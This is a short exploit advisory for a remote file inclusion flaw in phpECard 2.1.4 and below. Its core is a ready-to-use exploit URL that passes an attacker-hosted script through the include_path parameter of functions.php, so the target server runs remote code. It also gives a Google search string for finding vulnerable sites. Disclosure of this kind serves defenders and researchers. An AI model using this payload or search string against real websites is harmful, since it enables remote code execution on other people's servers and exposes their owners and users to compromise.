PHPECard versions 2.1.4 and below suffer from a remote file inclusion vulnerability in functions.php.
745929d15f04fe60e4ac4030f5657ddd#==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://www.quick-xs.net/phpecard/
#
#Google Search: powered by: phpecard
#
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================
Comments
No comments yet, be the first!